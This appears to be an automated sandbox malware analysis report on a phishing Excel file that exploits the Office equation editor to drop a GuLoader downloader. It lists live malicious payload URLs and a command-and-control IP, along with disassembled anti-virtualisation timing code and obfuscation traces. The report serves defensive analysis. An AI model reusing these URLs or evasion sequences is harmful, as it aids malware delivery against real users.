Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A84	6_2_003B5A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AFD	6_2_003B2AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AD6	6_2_003B2AD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2470	6_2_003B2470
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3C4D	6_2_003B3C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC	6_2_003B7EFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9	6_2_003B1FD9

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B0182 second address: 00000000003B0182 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B6E61 second address: 00000000003B6E61 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B01B2 second address: 00000000003B01B2 instructions:
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B78FC second address: 00000000003B790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000003B790A second address: 00000000003B79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007F2C903B46EAh 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007F2C903B46B4h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], eax 0x000000b2 mov eax, 03147A97h 0x000000b7 cmp ecx, ecx 0x000000b9 xor eax, 4F08C75Bh 0x000000be cmp cl, al 0x000000c0 sub eax, 1A91E3C1h 0x000000c5 sub eax, 318ADA0Bh 0x000000ca push eax 0x000000cb mov eax, dword ptr [ebp+00000246h] 0x000000d1 cmp bh, ah 0x000000d3 push 25819736h 0x000000d8 sub dword ptr [esp], 3CB652F7h 0x000000df xor dword ptr [esp], 3AF83707h 0x000000e6 pushad 0x000000e7 mov ebx, 000000DBh 0x000000ec rdtsc

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B883C rdtsc

6_2_003B883C

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1664

Thread sleep time: -60000s >= -30000s

Jump to behavior

Anti Debugging:

Potentially malicious time measurement code found

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852 Start: 003B4BE7 End: 003B480D	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E Start: 003B4BE7 End: 003B480D	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128 Start: 003B4BE7 End: 003B480D	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F Start: 003B4BE7 End: 003B480D	6_2_003B423F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277 Start: 003B4BE7 End: 003B480D	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263 Start: 003B4BE7 End: 003B480D	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46 Start: 003B5BED End: 003B480D	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7 Start: 003B4BE7 End: 003B480D	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E Start: 003B4BE7 End: 003B480D	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5 Start: 003B4BE7 End: 003B480D	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488 Start: 003B4BE7 End: 003B480D	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4 Start: 003B4BE7 End: 003B480D	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4 Start: 003B4BE7 End: 003B480D	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9 Start: 003B4BE7 End: 003B480D	6_2_003B1FD9

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 6_2_003B883C rdtsc

6_2_003B883C

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2 mov eax, dword ptr fs:[00000030h]	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5201 mov eax, dword ptr fs:[00000030h]	6_2_003B5201
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7365 mov eax, dword ptr fs:[00000030h]	6_2_003B7365
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7 mov eax, dword ptr fs:[00000030h]	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33EC mov eax, dword ptr fs:[00000030h]	6_2_003B33EC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B348A mov eax, dword ptr fs:[00000030h]	6_2_003B348A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B6D92 mov eax, dword ptr fs:[00000030h]	6_2_003B6D92
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC mov eax, dword ptr fs:[00000030h]	6_2_003B7EFC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.2355005736.0000000000940000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
180.214.239.39	unknown	Viet Nam		135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://kinmirai.org/wp-content/bin_QVwo	true	Avira URL Cloud: safe	unknown
http://180.214.239.39/disk/.svchost.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "https://kinmirai.org/wp-content/bin_QVwo"}

Multi AV Scanner detection for submitted file

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

ReversingLabs: Detection: 28%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 180.214.239.39:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 74MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://kinmirai.org/wp-content/bin_QVwo

Downloads executable code via HTTP

Source: global traffic

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 180.214.239.39 180.214.239.39

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39
Source: unknown	TCP traffic detected without corresponding DNS query: 180.214.239.39

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B0A6367.emf

Jump to behavior

Source: global traffic

Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: 3B0A6367.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0
Source: .svchost[1].exe.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: .svchost[1].exe.4.dr	String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: Enable Editing from the yellow bar above i: I! i T Thisdocument is 3. Once you have enabled editi

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55BB NtAllocateVirtualMemory,	6_2_003B55BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55F6 NtAllocateVirtualMemory,	6_2_003B55F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5724 NtAllocateVirtualMemory,	6_2_003B5724

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55BB	6_2_003B55BB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5852	6_2_003B5852
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1057	6_2_003B1057
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B78B2	6_2_003B78B2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B48E8	6_2_003B48E8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B28E2	6_2_003B28E2
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8138	6_2_003B8138
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B513E	6_2_003B513E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4128	6_2_003B4128
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3920	6_2_003B3920
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B19CC	6_2_003B19CC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B423F	6_2_003B423F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4277	6_2_003B4277
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B4263	6_2_003B4263
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8254	6_2_003B8254
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A46	6_2_003B5A46
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5A84	6_2_003B5A84
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AFD	6_2_003B2AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2AD6	6_2_003B2AD6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B22D5	6_2_003B22D5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B5359	6_2_003B5359
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33A7	6_2_003B33A7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B33EC	6_2_003B33EC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2470	6_2_003B2470
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B045E	6_2_003B045E
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2C5C	6_2_003B2C5C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3C4D	6_2_003B3C4D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B84A6	6_2_003B84A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7CA5	6_2_003B7CA5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B348A	6_2_003B348A
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7488	6_2_003B7488
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B34EA	6_2_003B34EA
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B84E9	6_2_003B84E9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B3568	6_2_003B3568
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B35B0	6_2_003B35B0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8DB4	6_2_003B8DB4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2DA0	6_2_003B2DA0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0584	6_2_003B0584
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B55F6	6_2_003B55F6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B25D4	6_2_003B25D4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B2E2F	6_2_003B2E2F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B9626	6_2_003B9626
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B0618	6_2_003B0618
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8E7C	6_2_003B8E7C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B968F	6_2_003B968F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7EFC	6_2_003B7EFC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B46E4	6_2_003B46E4
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8ED8	6_2_003B8ED8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B8F40	6_2_003B8F40
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B7FF5	6_2_003B7FF5
Source: C:\Users\Public\vbc.exe	Code function: 6_2_003B1FD9	6_2_003B1FD9

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: .svchost[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/17@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$CMA-CGM BOOKING CONFIRMATION.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDA95.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

ReversingLabs: Detection: 28%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Static file information: File size 1215488 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: .svchost[1].exe.4.dr

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Initial sample: OLE indicators vbamacros = False

Source: CMA-CGM BOOKING CONFIRMATION.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000006.00000002.2354861374.00000000003B0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00406408 push es; ret	6_2_0040640F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405D8C push es; ret	6_2_00405D8B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301833 push edx; ret	6_2_00301861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304833 push edx; ret	6_2_00304861
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303033 push edx; ret	6_2_00303061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306034 push edx; ret	6_2_00306061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300038 push edx; ret	6_2_00300061
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301023 push edx; ret	6_2_00301051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302823 push edx; ret	6_2_00302851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304023 push edx; ret	6_2_00304051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00307024 push edx; ret	6_2_00307051
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305825 push edx; ret	6_2_00305851
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303813 push edx; ret	6_2_00303841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302013 push edx; ret	6_2_00302041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305013 push edx; ret	6_2_00305041
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306814 push edx; ret	6_2_00306841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300818 push edx; ret	6_2_00300841
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304803 push edx; ret	6_2_00304831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303003 push edx; ret	6_2_00303031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301803 push edx; ret	6_2_00301831
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306004 push edx; ret	6_2_00306031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300008 push edx; ret	6_2_00300031
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00302074 push edx; ret	6_2_003020A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303874 push edx; ret	6_2_003038A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00305074 push edx; ret	6_2_003050A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306875 push edx; ret	6_2_003068A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00300878 push edx; ret	6_2_003008A1
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00303063 push edx; ret	6_2_00303091
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00301863 push edx; ret	6_2_00301891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00304863 push edx; ret	6_2_00304891
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00306065 push edx; ret	6_2_00306091

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

